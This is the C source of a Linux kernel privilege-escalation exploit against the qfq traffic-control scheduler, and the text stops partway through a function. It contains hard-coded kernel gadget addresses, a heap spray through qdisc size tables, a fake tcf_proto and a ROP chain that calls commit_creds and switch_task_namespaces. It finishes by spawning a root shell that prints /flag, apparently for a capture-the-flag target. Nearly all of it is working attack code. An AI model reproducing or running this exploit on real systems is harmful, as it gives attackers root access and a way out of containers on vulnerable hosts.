#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <linux/keyctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/if_packet.h>
#include <linux/if_xdp.h>
#include <linux/pkt_cls.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <signal.h>
#include <netinet/in.h>

// Fixed-width integer shorthands used throughout this file.
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef char i8;
typedef short i16;
typedef int i32;
typedef long long i64;

// Fail the build if any shorthand above does not have the expected width.
_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1");
_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2");
_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4");
_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8");
_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1");
_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2");
_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4");
_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8");

// Logging helpers: print fmt to stdout with an "INFO: " / "ERROR: " prefix
// and a trailing newline.
#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__)
#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__)

// If x is true, report the stringified expression via perror() and return -1
// from the *enclosing* function. NOTE: this expands to a bare `if` block (no
// do/while(0)) and some call sites in this file omit the trailing semicolon,
// so changing the expansion shape requires fixing those call sites as well.
#define FAIL_IF(x) if ((x)) { \
    perror(#x); \
    return -1; \
}

// Byte-array initializer helpers: pad4/pad8 repeat x (cast to u8) four/eight
// times; p64 expands x into its eight bytes, least-significant byte first.
#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x
#define pad8(x) pad4(x), pad4(x)

#define p64(x) (u8)(((x) >> 0) & 0xFF), \
    (u8)(((u64)(x) >> 8) & 0xFF), \
    (u8)(((u64)(x) >> 16) & 0xFF), \
    (u8)(((u64)(x) >> 24) & 0xFF), \
    (u8)(((u64)(x) >> 32) & 0xFF), \
    (u8)(((u64)(x) >> 40) & 0xFF), \
    (u8)(((u64)(x) >> 48) & 0xFF), \
    (u8)(((u64)(x) >> 56) & 0xFF)

// Number of elements of a real array (meaningless when applied to a pointer).
#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

// Remove compiler padding so struct layouts follow the per-field offset
// comments exactly.
#define PACK __attribute__((__packed__))

// Tiny polling event flag. Note the inverted encoding: SET is 0, UNSET is 1.
#define __EVENT_SET 0
#define __EVENT_UNSET 1

// EVENT_WAIT sleeps in 1 ms steps until it observes the flag SET; the same
// atomic exchange resets the flag to UNSET, so each SET is consumed once.
#define EVENT_DEFINE(name, init) volatile int name = init
#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); }

#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE)
#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE)

// GADGETS {
// Kernel symbol and gadget addresses for one specific kernel build, expressed
// relative to the default text base 0xffffffff81000000. main() (with a base
// given on the command line) or get_kernel_base() shifts every entry listed in
// FOR_ALL_OFFSETS by the detected KASLR slide before they are used.
// The trailing comments record each gadget's disassembly and raw bytes.
u64 find_task_by_vpid = 0xffffffff8110a0d0;
u64 switch_task_namespaces = 0xffffffff81111c80;
u64 commit_creds = 0xffffffff811136f0;
u64 prepare_kernel_cred = 0xffffffff811139d0;
u64 init_task = 0xffffffff836159c0;
u64 init_nsproxy = 0xffffffff83661680;
u64 oops_in_progress = 0xffffffff8419f478;
u64 mov_rdi_rax = 0xffffffff81041293; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp 0xffffffff82404440 {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3
u64 pop_rcx_ret = 0xffffffff8102898c; // pop rcx; ret // 59c3
u64 pop_rsi = 0xffffffff8101806c; // pop rsi; jmp 0xffffffff82404440 {taken}; ret // 5ee9ce1e4001c3
u64 pop_rdi = 0xffffffff8102764d; // pop rdi; jmp 0xffffffff82404440 {taken}; ret // 5fe97e094001c3
u64 push_rsi_jmp_rsi_0x39 = 0xffffffff818ca79b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639

u64 pop_rsp = 0xffffffff8100143b; // pop rsp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 5ce9ff2f4001c3
u64 add_rsp_0x88 = 0xffffffff8103d43d; // add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 4881c488000000e9f76f3c01c3

u64 enter_pop_rbx_pop_rbp_pop_r12 = 0xffffffff81b14680; // enter 0, 0; pop rbx; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // c80000005b5d415ce9b3fd8e00c3
// Net effect of the gadget above: rbx receives the old rbp (pushed by
// `enter`), then rbp and r12 are popped from the chain.
u64 mov_rbp_rbx_pop_rbx_pop_rbp = 0xffffffff8107ff46; // mov [rbp], rbx; pop rbx; pop rbp; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // 48895d005b5de9ef443801c3
u64 push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12 = 0xffffffff81be0fed; // push qword ptr [rcx+rsi+0x5b]; pop rbp; pop r12; jmp __x86_return_thunk (0xffffffff82404440) {taken}; ret // ff74315b5d415ce947348200c3

// trailer of qfq_enqueue
//  0xffffffff81cd460f <+591>:   lea    -0x28(%rbp),%rsp
//  0xffffffff81cd4613 <+595>:   mov    %ecx,%eax
//  0xffffffff81cd4615 <+597>:   pop    %rbx
//  0xffffffff81cd4616 <+598>:   pop    %r12
//  0xffffffff81cd4618 <+600>:   pop    %r13
//  0xffffffff81cd461a <+602>:   pop    %r14
//  0xffffffff81cd461c <+604>:   pop    %r15
//  0xffffffff81cd461e <+606>:   pop    %rbp
//  0xffffffff81cd461f <+607>:   jmp    0xffffffff82404440 <__x86_return_thunk>
u64 leave = 0xffffffff81cd460f;

u64 add_rcx_edi = 0xffffffff81063063; // add [rcx], edi; ret // 0139c3

// } GADGETS

// X-macro that applies x() to every kernel-address global in the GADGETS
// section, so all of them can be relocated together. Keep this list in sync
// with the GADGETS section: an address missing here is never relocated.
#define FOR_ALL_OFFSETS(x) do { \
    x(find_task_by_vpid); \
    x(switch_task_namespaces); \
    x(commit_creds); \
    x(prepare_kernel_cred); \
    x(init_task); \
    x(init_nsproxy); \
    x(oops_in_progress); \
    x(mov_rdi_rax); \
    x(pop_rcx_ret); \
    x(pop_rsi); \
    x(pop_rdi); \
    x(push_rsi_jmp_rsi_0x39); \
    x(pop_rsp); \
    x(add_rsp_0x88); \
    x(enter_pop_rbx_pop_rbp_pop_r12); \
    x(mov_rbp_rbx_pop_rbx_pop_rbp); \
    x(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12); \
    x(leave); \
    x(add_rcx_edi); \
  } while(0)

// Reverse calculation of the index in sch_qfq.c:qfq_calc_index
// Our desired index will be 27 so that the fake group resides at offset 288 into
// our large spray object.
// LMAX is the lmax (and device MTU) that should make qfq_calc_index() yield
// _TARGET_INDEX for a single class of weight _CLS_WEIGHT. With the values
// below it evaluates to 2^51 / 2^30 = 2^21 = 2097152.
#define _TARGET_INDEX 27
#define _MIN_SLOT_SHIFT 25
#define _NUM_CLS 1
#define _CLS_WEIGHT 1
#define _ONE_FP 0x40000000
#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS)

// Assumed size of the kernel's struct qdisc_size_table header, which precedes
// the TCA_STAB data in the same allocation. stab_payload subtracts it so that
// offsets are relative to the start of the kernel object — TODO confirm for
// the target kernel.
#define SIZEOF_QDISC_SIZE_TABLE 60

// Userspace mirrors of the kernel's list types. They exist only so the
// kernel struct layouts below can be spelled out with the right sizes.
struct list_head {
  struct list_head *         next;                 /*     0     8 */
  struct list_head *         prev;                 /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};


struct hlist_head {
  struct hlist_node *        first;                /*     0     8 */

  /* size: 8, cachelines: 1, members: 1 */
  /* last cacheline: 8 bytes */
};

struct hlist_node {
  struct hlist_node *        next;                 /*     0     8 */
  struct hlist_node * *      pprev;                /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};

// Userspace mirror of the kernel's struct tcf_proto (pahole-style layout).
// Kernel-internal pointer types are replaced by void*, and holes are made
// explicit with __pad fields. The struct is packed so the offsets match the
// comments, and the static assert pins the total size at 104 bytes.
struct tcf_proto {
  void*         next;                 /*     0     8 */
  void *                     root;                 /*     8     8 */
  int                        (*classify)(void*, const struct tcf_proto  *, void*); /*    16     8 */
  u16                     protocol;             /*    24     2 */

  /* XXX 2 bytes hole, try to pack */
  u8 __pad0[2];

  u32                        prio;                 /*    28     4 */
  void *                     data;                 /*    32     8 */
  const void  * ops;               /*    40     8 */
  void *         chain;                /*    48     8 */
  u32                 lock;                 /*    56     4 */
  u8                       deleting;             /*    60     1 */

  /* XXX 3 bytes hole, try to pack */
  u8 __pad1[3];

  /* --- cacheline 1 boundary (64 bytes) --- */
  u32                 refcnt;               /*    64     4 */

  /* XXX 4 bytes hole, try to pack */
  u8 __pad2[4];

  u8       rcu[16];
  struct hlist_node          destroy_ht_node;      /*    88    16 */

  /* size: 104, cachelines: 2, members: 13 */
  /* sum members: 95, holes: 3, sum holes: 9 */
  /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;
_Static_assert(sizeof(struct tcf_proto) == 104);

// Userspace mirror of the kernel's struct qfq_group (296 bytes per the layout
// comments). The only field this program sets is `index`, in
// prep_stage1_large_payload().
struct qfq_group {
  u64                        S;                    /*     0     8 */
  u64                        F;                    /*     8     8 */
  unsigned int               slot_shift;           /*    16     4 */
  unsigned int               index;                /*    20     4 */
  unsigned int               front;                /*    24     4 */

  u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */

  long unsigned int          full_slots;           /*    32     8 */
  struct hlist_head          slots[32];            /*    40   256 */

  /* size: 296, cachelines: 5, members: 7 */
  /* sum members: 292, holes: 1, sum holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;

// TCA_STAB_DATA blob attached to every qfq qdisc (see create_qfq_qisc()).
// __pad1 places `group` at offset 288 of the kernel allocation once the
// SIZEOF_QDISC_SIZE_TABLE header that precedes the data is counted.
// `id` is incremented before each copy is sent, presumably to keep the blobs
// distinct — TODO confirm.
struct stab_payload {
  u8 __pad1[288 - SIZEOF_QDISC_SIZE_TABLE];
  struct qfq_group group;
  u8 __pad2[4098 - sizeof(struct qfq_group) - 288 - 4];
  u32 id;
} PACK;
// Header + data must exceed 4096 bytes.
_Static_assert(sizeof(struct stab_payload) > 4096 - SIZEOF_QDISC_SIZE_TABLE);

// Our fake tcf_proto we will place into qfq_sched->filter_list
// The union lets the same bytes be written either as tcf_proto fields or as
// a raw 100-qword area (used for the ROP chain in prep_tcf_proto_payload()).
struct tcf_proto_payload {
  union {
    struct tcf_proto org;
    u64 stack[100];
  };
} PACK;

// Restrict the calling process/thread to run only on CPU `id`.
// Returns sched_setaffinity()'s result: 0 on success, -1 with errno set.
static int _pin_to_cpu(int id) {
  cpu_set_t mask;

  CPU_ZERO(&mask);
  CPU_SET(id, &mask);

  const pid_t self = getpid();
  return sched_setaffinity(self, sizeof(mask), &mask);
}

// Kernel base detected by get_kernel_base().
static u64 leak_kernel_base = 0;

// mmap'd buffer that main() fills with prep_tcf_proto_payload(); workers
// register it as AF_XDP UMEM memory via spray_one_umem().
static void* payload = NULL;
// Template copied into every qfq qdisc's TCA_STAB data by create_qfq_qisc().
static struct stab_payload fake_group = {0};

int get_kernel_base();

// Number of workers main() spawns per attempt (overridable at build time).
#ifndef ATTEMPT_LARGE_EVERY
#define ATTEMPT_LARGE_EVERY 17
#endif

// Success check: if PID 1's mount namespace can be opened, the payload is
// assumed to have worked. In that case this function tries to join PID 1's
// mount, pid and net namespaces and execs a shell that first prints /flag.
// It returns silently if the open fails. exit(1) is only reached if execve()
// fails.
// NOTE(review): setns() results are unchecked, and the pid/net namespace fds
// are opened inline without error checks.
void maybe_win() {
  int fd = open("/proc/1/ns/mnt", O_RDONLY);
  if (fd < 0) {
    return;
  }

  L("SUCCESS.");
  setns(fd, 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  L("spawning shell ..");
  char* argv[] = {
    "/bin/sh",
    "-c",
    "/bin/cat /flag && /bin/sh",
    NULL,
  };
  execve(argv[0], argv, NULL);
  exit(1);
}


// Fill *p with a fake struct tcf_proto whose bytes also carry a kernel ROP
// chain. The chain is built as a byte array with designated offsets and copied
// over p->stack, which aliases the tcf_proto fields through the union.
// The fields assigned at the end (classify at 16, protocol at 24, ops at 40)
// fall in bytes the chain leaves zero.
//
// Per the gadget names, the chain:
//   1. saves a frame-pointer value into the oops_in_progress word,
//   2. calls commit_creds(prepare_kernel_cred(init_task)),
//   3. calls switch_task_namespaces(find_task_by_vpid(1), init_nsproxy),
//   4. reloads the saved value (+0x48) as rbp and continues through the
//      epilogue of qfq_enqueue (`leave`).
//
// The gadget globals must already be relocated for KASLR (main() does so
// before calling this).
void prep_tcf_proto_payload(struct tcf_proto_payload* p) {
  memset(p, 0, sizeof(*p));

  // store framepointer at a sane address.
  const u64 framepp = oops_in_progress;

  u8 rop[] = {
    [0] = p64(add_rsp_0x88),

    // Loaded through classify = push_rsi_jmp_rsi_0x39, i.e. from [rsi+0x39].
    [0x39] = p64(pop_rsp),

    [8 + 0x88] = p64(enter_pop_rbx_pop_rbp_pop_r12),
    p64(framepp),
    p64(0xdead000000000001), // scratch r12
    p64(mov_rbp_rbx_pop_rbx_pop_rbp),
    p64(0xdead000000000002), // scratch rbx
    p64(0xdead000000000003), // scratch rbp
    p64(add_rsp_0x88),

    [8 + 0x88 + 8 * 7 + 0x88] = p64(add_rsp_0x88),

    // commit_creds(prepare_kernel_cred(init_task))
    [8 + 0x88 + 8 * 7 + 0x88 + 8 + 0x88] = p64(pop_rdi),
    p64(init_task),
    p64(prepare_kernel_cred),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(commit_creds),

    // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
    p64(pop_rdi),
    p64(1),
    p64(find_task_by_vpid),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(pop_rsi),
    p64(init_nsproxy),
    p64(switch_task_namespaces),

    // restore execution in qfq_enqueue
    p64(pop_rcx_ret),
    p64(framepp),
    p64(pop_rdi),
    p64(0x48),
    p64(add_rcx_edi),
    p64(pop_rsi),
    p64(-0x5b),
    p64(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12),
    p64(0xdead000000000004), // scratch r12
    p64(leave),
  };

  _Static_assert(sizeof(rop) < sizeof(p->stack));
  memcpy(p->stack, rop, sizeof(rop));

  // Same protocol value create_tcfilter() uses for the real filter.
  p->org.protocol = 8;
  p->org.classify = (void*)push_rsi_jmp_rsi_0x39;
  // Non-canonical poison pointer; presumably never dereferenced on the taken
  // path — TODO confirm.
  p->org.ops = (void*)0xdead000000000000;
}

// Initialise the fake_group template. Everything is zeroed except
// group.index, which selects the bit that the out-of-range group index causes
// to be set. The arithmetic below turns a byte distance into a bit index.
void prep_stage1_large_payload(struct stab_payload* p) {
  memset(p, 0, sizeof(*p));

  // This index will control the bit we flip.
  // 8192 - offsetof(struct Qdisc, privdata) - offsetof(struct qfq_sched, bitmaps))   // the rest of the first qdisc
  // + 8192                                                                           // spacing of key payload
  // + offsetof(struct Qdisc, privdata) + offsetof(struct qfq_sched, filter_list)     // offset into the second qdisc
  // (times 8 + FFS(0x80))
  p->group.index = (8192 - 384 - 72 + 8192 + 384 + 0) * 8 + 7;
}

// Table of spawned workers. last_worker is the number of slots in use, which
// is also the next slot spawn_worker() fills. A slot keeps its `stack` mapping
// after the worker is killed so that later spawns can reuse it.
static int last_worker = 0;
static struct {
    int pid;
    void* stack;
} workers[200] = {0};

// Start target(arg) as a new task that shares our address space (CLONE_VM)
// and runs in fresh user and network namespaces. It runs on a 16 KiB mmap'd
// stack that is cached per slot in workers[] and reused by later spawns.
//
// Returns the worker's slot index, or -1 on failure:
//   - table full (errno = ENOSPC),
//   - mmap failure (reported via perror),
//   - clone failure (errno from clone).
int spawn_worker(int (*target)(void*), void* arg) {
  enum { WORKER_STACK_SIZE = 0x4000 };
  const int capacity = (int)(sizeof(workers) / sizeof(workers[0]));

  // Never index past the fixed-size table.
  if (last_worker < 0 || last_worker >= capacity) {
    errno = ENOSPC;
    return -1;
  }

  void* stack = workers[last_worker].stack;

  if (stack == NULL) {
    stack = mmap(NULL, WORKER_STACK_SIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    FAIL_IF(stack == MAP_FAILED);
    workers[last_worker].stack = stack;
  }

  // clone() expects the top of the stack area (the stack grows down on x86).
  int child = clone(target, (char*)stack + WORKER_STACK_SIZE, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg);

  if (child < 0) {
    return -1;
  }

  workers[last_worker].pid = child;
  last_worker++;

  return last_worker - 1;
}

// SIGKILL the worker in slot `index` if it is still live, and mark the slot
// dead (pid = -1). The slot count only shrinks when `index` is the topmost
// slot, which is why main() tears workers down from the top. Always returns 0.
int kill_worker(int index) {
  const int pid = workers[index].pid;
  if (pid > 0) {
    kill(pid, SIGKILL);
    workers[index].pid = -1;
  }

  const int top = last_worker - 1;
  if (index == top) {
    last_worker = top;
  }

  return 0;
}

// Extract the status from a netlink NLMSG_ERROR reply stored in *nlh.
// Returns nlmsgerr.error: 0 means success. A non-zero value is logged, and
// errno is set to its negation, since the kernel reports failures as negative
// errno values. `fd` is not used. Asserts that the message really is an
// NLMSG_ERROR large enough to hold a struct nlmsgerr.
int netlink_errno(int fd, struct nlmsghdr* nlh) {
  (void)fd;

  assert(nlh->nlmsg_type == NLMSG_ERROR);
  const struct nlmsgerr* err = NLMSG_DATA(nlh);
  assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*err)));

  const int code = err->error;
  if (code == 0) {
    return 0;
  }

  E("netlink error: %d", code);
  errno = -code;
  return code;
}

// Send the `size`-byte request in `buf` on socket `fd`, then receive the next
// reply into the same buffer, overwriting the request.
//
// The reply's full length is first peeked with MSG_PEEK | MSG_TRUNC and no
// iovec, and the whole reply is then read into `buf`. NOTE: `buf` must be large
// enough for that reply; the read length is not bounded by `size`.
//
// Returns the number of bytes received, or -1 on error (after perror()).
int netlink_send_recv(int fd, void* buf, int size) {
  struct iovec iov = {
    .iov_base = buf,
    .iov_len = size,
  };
  struct msghdr msg = {
    .msg_name = NULL,
    .msg_namelen = 0,
    .msg_iov = &iov,
    .msg_iovlen = 1,
    .msg_control = NULL,
    .msg_controllen = 0,
    .msg_flags = 0,
  };
  if (sendmsg(fd, &msg, 0) < 0) {
    perror("sendmsg()");
    return -1;
  }

  // Peek at the pending reply without consuming it, to learn its real length.
  // The result goes into a signed ssize_t: storing it straight into the
  // size_t iov_len made the `< 0` error check impossible.
  msg.msg_iov = NULL;
  msg.msg_iovlen = 0;
  ssize_t reply_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC);
  if (reply_len < 0) {
    perror("recvmsg()");
    return -1;
  }

  iov.iov_len = (size_t)reply_len;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  return (int)recvmsg(fd, &msg, 0);
}

// Flags shared between main() and the CLONE_VM workers. They are plain
// volatile ints that are polled; they are not a real synchronization
// primitive.
// wake: index of the worker main() wants to run next; that worker resets it
// to 0 when it resumes.
static volatile int wake = 0;
// done: when non-zero, a waiting worker returns 0.
// NOTE(review): not set anywhere in the visible code.
static volatile int done = 0;
// qdisc_trigger_bug: index of the worker that triggers the vulnerability.
static volatile int qdisc_trigger_bug = 0;
// NOTE(review): qdisc_trigger_payload is not referenced in the visible code.
static volatile int qdisc_trigger_payload = 0;
// event which will be set whenever control is handed over back to main
static EVENT_DEFINE(parent_notify, __EVENT_UNSET);

int prepare_device(int s, int ifindex) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  FAIL_IF(nlh == NULL);

  struct ifinfomsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWLINK;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  // Up the device
  data->ifi_family = PF_UNSPEC;
  data->ifi_type = 0;
  data->ifi_index = ifindex;
  data->ifi_flags = IFF_UP;
  data->ifi_change = 1;

  // Set MTU size, used to trigger the vulnerability
  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  attr->nla_type = IFLA_MTU;
  attr->nla_len = NLA_HDRLEN + 4;
  u32* attr_data = (void*)attr + NLA_HDRLEN;
  *attr_data = LMAX;

  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to prepare device!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a rsvp tcfilter, used to spray our tcf_proto object.
//
// Sends RTM_NEWTFILTER (with ACK) on the rtnetlink socket `s`. The filter is
// attached to qdisc `parent` on interface `ifindex`, with priority `prio` and
// protocol 8.
// Returns 0 on success, -1 on failure. A -EBUSY reply is deliberately treated
// as success (see below).
int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  if (nlh == NULL) {
    perror("calloc()");
    return -1;
  }

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTFILTER;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = 0;

  // tcm_info: priority in the upper 16 bits, protocol in the lower 16 bits.
  u16 protocol = 8;
  data->tcm_info = ((u32)prio << 16) | (u32)protocol;

  // TCA_KIND = "rsvp" (NUL included, padded to NLA alignment by calloc zeros).
  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  attr->nla_type = TCA_KIND;
  attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1);
  strcpy((char*)attr + NLA_HDRLEN, "rsvp");
  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  int err = netlink_errno(s, nlh);

  // This sometimes shows EBUSY, but it still works?
  // We just ignore the error, ...
  if (err != -EBUSY && err != 0) {
    E("failed to create tcfilter!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic.
//
// Sends RTM_NEWQDISC (with ACK) on the rtnetlink socket `s`. The qdisc has
// major handle `handle` and is attached under `parent` on `ifindex`, with a
// queue limit of 1 packet.
// Returns 0 on success, -1 on failure.
int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) {
  struct nlmsghdr* nlh = calloc(2, 8192);
  if (nlh == NULL) {
    perror("calloc()");
    return -1;
  }

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));

  // TCA_KIND = "netem"
  attr->nla_type = TCA_KIND;
  attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1);
  strcpy((char*)attr + NLA_HDRLEN, "netem");
  nlh->nlmsg_len += attr->nla_len;
  attr = (void*)attr + attr->nla_len;

  // TCA_OPTIONS = struct tc_netem_qopt
  attr->nla_type = TCA_OPTIONS;
  attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt);

  struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN;
  // NOTE: 1000u * 1000 * 5000 does not fit in the u32 field and wraps
  // (well-defined unsigned arithmetic) to 705032704. The value is kept
  // because it is still a large delay.
  // NOTE(review): sch_netem converts this field with PSCHED_TICKS2NS, so the
  // unit is presumably psched ticks rather than microseconds — confirm for the
  // target kernel.
  netem_qopt->latency = 1000u * 1000 * 5000;
  netem_qopt->limit = 1;

  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create netem qdisc!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a qfq qdisc, main qdisc of interest.
//
// Sends RTM_NEWQDISC (with ACK) on the rtnetlink socket `s`. The qdisc has
// major handle `handle` and is attached under `parent` on `ifindex`; the only
// call site passes TC_H_ROOT.
// A TCA_STAB size table is attached whose data is a copy of the global
// fake_group blob, so each qdisc created here comes with one kernel-side copy
// of it. fake_group.id is incremented before every copy.
// Returns 0 on success, -1 on failure.
int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle) {
  struct nlmsghdr* nlh = calloc(1, 8192);
  if (nlh == NULL) {
    perror("calloc()");
    return -1;
  }

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));

  // TCA_KIND = "qfq"
  attr->nla_type = TCA_KIND;
  attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1);
  strcpy((char*)attr + NLA_HDRLEN, "qfq");
  nlh->nlmsg_len += attr->nla_len;
  attr = (void*)attr + attr->nla_len;

  // This is the sizetable we spray alongside each qdisc:
  // TCA_STAB { TCA_STAB_BASE = tc_sizespec, TCA_STAB_DATA = fake_group }
  attr->nla_type = TCA_STAB;
  attr->nla_len = NLA_HDRLEN;

  struct nlattr* nested = (void*)attr + NLA_HDRLEN;
  nested->nla_type = TCA_STAB_BASE;
  nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec);
  attr->nla_len += nested->nla_len;

  struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN;
  sizespec->cell_log = 10;
  sizespec->size_log = 0;
  sizespec->cell_align = 0;
  sizespec->overhead = 0;
  sizespec->linklayer = 0;
  sizespec->mpu = 0;
  sizespec->mtu = 0;
  // tsize counts u16 table entries, so it covers the whole blob.
  sizespec->tsize = sizeof(struct stab_payload) / sizeof(u16);

  nested = (void*)nested + nested->nla_len;
  nested->nla_type = TCA_STAB_DATA;
  nested->nla_len = NLA_HDRLEN + sizespec->tsize * sizeof(u16);
  attr->nla_len += nested->nla_len;

  fake_group.id++;
  memcpy((void*)nested + NLA_HDRLEN, &fake_group, sizeof(fake_group));

  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create qfq qdisc!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Delete a class from a qdisc.
//
// Sends RTM_DELTCLASS (with ACK) for class `handle` under the root qdisc of
// interface `ifindex`, on the rtnetlink socket `s`.
// Returns 0 on success, -1 on failure.
int delete_class(int s, int ifindex, u32 handle) {
  L("deleting class %x", handle);

  struct nlmsghdr* nlh = calloc(1, 4096);
  if (nlh == NULL) {
    perror("calloc()");
    return -1;
  }

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_DELTCLASS;
